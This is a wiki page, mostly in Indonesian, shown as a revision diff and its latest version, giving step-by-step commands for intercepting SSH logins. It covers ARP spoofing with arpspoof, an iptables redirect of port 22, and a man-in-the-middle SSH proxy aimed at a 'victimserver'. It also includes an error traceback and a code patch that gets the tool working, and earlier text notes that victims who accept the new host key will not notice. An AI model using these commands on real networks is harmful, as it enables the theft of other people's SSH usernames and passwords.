Difference between revisions of "MITM: mitm ssh"

From OnnoWiki
Jump to navigation Jump to search
 
(20 intermediate revisions by the same user not shown)
Line 1: Line 1:
 
sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
 
sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html
  
 +
 +
==Diagram==
 +
 +
client --> mitmproxy --> ssh server
 +
 +
 +
* ip client: 192.168.0.106 (misalnya)
 +
* ip server: 192.168.0.100 (misalnya)
 +
 +
 +
==ARPspoofing==
 +
 +
ARP Spoof
 +
 +
sudo su
 +
arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null
 +
 +
Set firewall agar bisa NAT
 +
 +
sudo su
 +
sysctl -w net.ipv4.ip_forward=1
 +
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
  
 
==Download==
 
==Download==
Line 10: Line 32:
 
==Generate Keys==
 
==Generate Keys==
  
./mitmkeys
+
cd ~/mitmproxy-master/
 
+
./mitmkeygen
Ini akan masuk ke ~/.mitmkeys
 
  
==Instal SSH key yang akan di serang==
+
key akan di simpan di
  
  #Install SSH key
+
  ~/.mitmkeys/
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
 
  
==Jalankan proxy==
+
==Instal SSH key server yang akan di serang==
  
Then run the proxy, pointing it at the victimserver.
+
Copykan:
  
  ./mitmproxy_ssh -H victimserver
+
  ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver
  
This runs the proxy on localhost:2222
+
Contoh:
  
Now simply connect to the local proxy:
+
ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100
  
ssh localhost -p 2222
+
==Jalankan proxy==
  
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
 
  
  
 +
Jalankan proxy, arahkan ke victimserver.
  
 +
cd ~/mitmproxy-master/
 +
./mitmproxy_ssh -H victimserver
 +
./mitmproxy_ssh -H 192.168.0.100 -s
  
 +
ini akan menjalankan proxy di localhost:2222
  
 +
Harusnya bisa dilihat dengan
  
 +
ssh localhost -p 2222
  
  
==Diagram==
 
  
client --> mitmproxy --> ssh server
+
Now simply connect to the local proxy:
  
- target server ip: 192.168.202.124
+
ssh localhost -p 2222
  
 +
And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.
  
 
==Instalasi==
 
==Instalasi==
Line 54: Line 80:
  
  
==Download==
+
==Jika Error ==
 
 
$ git clone https://github.com/saironiq/mitmproxy.git
 
 
 
3- if you can not run mitmreplay_ssh, it might be there is changing structure of pycrypto of the version you install, so
 
- modify file mitmproxy/mitmproxy/sshdebug.py
 
  -- line 655 modify it to below
 
mpints.append(cnumber.bytes_to_long(
 
  -- line 11 add the following line
 
from Crypto.Util import number as cnumber
 
 
 
4- generate keys
 
$ cd  mitmproxy
 
$ sudo ./mitmproxy
 
  
==update firewall==
 
  
5- update ip_forward rule and nat
+
./mitmproxy_ssh -H 192.168.0.100 -s
  $ sudo sysctl -w net.ipv4.ip_forward=1
+
  Server running on localhost:2222...
  $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
+
Original client connected to proxy server.
 +
Unhandled Error
 +
Traceback (most recent call last):
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
 +
    return callWithContext({"system": lp}, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
 +
    return context.call({ILogContext: newCtx}, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
 +
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
 +
    return func(*args,**kw)
 +
  --- <exception caught here> ---
 +
    File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
 +
    why = selectable.doRead()
 +
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
 +
    return self._dataReceived(data)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
 +
    rval = self.protocol.dataReceived(data)
 +
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived
 +
    self.dispatchMessage(messageNum, packet[1:])
 +
  File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage
 +
    payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet
 +
    self.output += func(payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init
 +
    mpints, payload = get_mpint(payload)
 +
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint
 +
    mpints.append(Util.number.bytes_to_long(
 +
exceptions.AttributeError: 'module' object has no attribute 'number'
 +
 +
Client disconnected.
  
6- run the mitmproxy_ssh and point to target server 192.168.202.124
+
Ini terjadi karena perubahan struktur pycrypto, ubah file mitmproxy/mitmproxy/sshdebug.py
$ sudo ./mitmproxy_ssh -H 192.168.202.124 -s
 
  
7- now when our client login to ssh server, if they the don't suspect the new key from server, it is very transparent to client
+
-- line 655 ubah menjadi
 +
mpints.append(cnumber.bytes_to_long(
  
- snapshot of username and password on our mitmproxy pc when client ssh to server 192.168.202.124
+
-- line 11 tambahkan
 +
from Crypto.Util import number as cnumber
  
 
==Referensi==
 
==Referensi==

Latest revision as of 08:24, 7 April 2017

sumber: http://www.atechnote.com/2016/10/intercept-username-and-password-using.html


Diagram

client --> mitmproxy --> ssh server


  • ip client: 192.168.0.106 (misalnya)
  • ip server: 192.168.0.100 (misalnya)


ARPspoofing

ARP Spoof

sudo su
arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null

Set firewall agar bisa NAT

sudo su
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222

Download

cd /root/
wget https://github.com/saironiq/mitmproxy/archive/master.zip
unzip master.zip

Generate Keys

cd ~/mitmproxy-master/
./mitmkeygen

key akan di simpan di

~/.mitmkeys/

Instal SSH key server yang akan di serang

Copykan:

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub user@victimserver

Contoh:

ssh-copy-id -i ~/.mitmkeys/id_rsa.pub onno@192.168.0.100

Jalankan proxy

Jalankan proxy, arahkan ke victimserver.

cd ~/mitmproxy-master/
./mitmproxy_ssh -H victimserver
./mitmproxy_ssh -H 192.168.0.100 -s 

ini akan menjalankan proxy di localhost:2222

Harusnya bisa dilihat dengan

ssh localhost -p 2222


Now simply connect to the local proxy:

ssh localhost -p 2222

And ta-da! You should see the raw data sent between client and server in the window you ran mitmproxy_ssh.

Instalasi

$ sudo pip install twisted
$ sudo  apt-get install python-service-identity
$ pip install pycrypto


Jika Error

./mitmproxy_ssh -H 192.168.0.100 -s
Server running on localhost:2222...
Original client connected to proxy server.
Unhandled Error
Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, *args, **kw)
  File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    return func(*args,**kw)
--- <exception caught here> ---
   File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
    return self._dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/usr/lib/python2.7/dist-packages/twisted/conch/ssh/transport.py", line 724, in dataReceived
    self.dispatchMessage(messageNum, packet[1:])
  File "/root/mitmproxy-master/mitmproxy/mitmproxy.py", line 1142, in dispatchMessage
    payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 71, in log_packet
    self.output += func(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 278, in msg_kexdh_init
    mpints, payload = get_mpint(payload)
  File "/root/mitmproxy-master/mitmproxy/sshdebug.py", line 655, in get_mpint
    mpints.append(Util.number.bytes_to_long(
exceptions.AttributeError: 'module' object has no attribute 'number'

Client disconnected. 

Ini terjadi karena perubahan struktur pycrypto, ubah file mitmproxy/mitmproxy/sshdebug.py

-- line 655 ubah menjadi
mpints.append(cnumber.bytes_to_long(
-- line 11 tambahkan
from Crypto.Util import number as cnumber

Referensi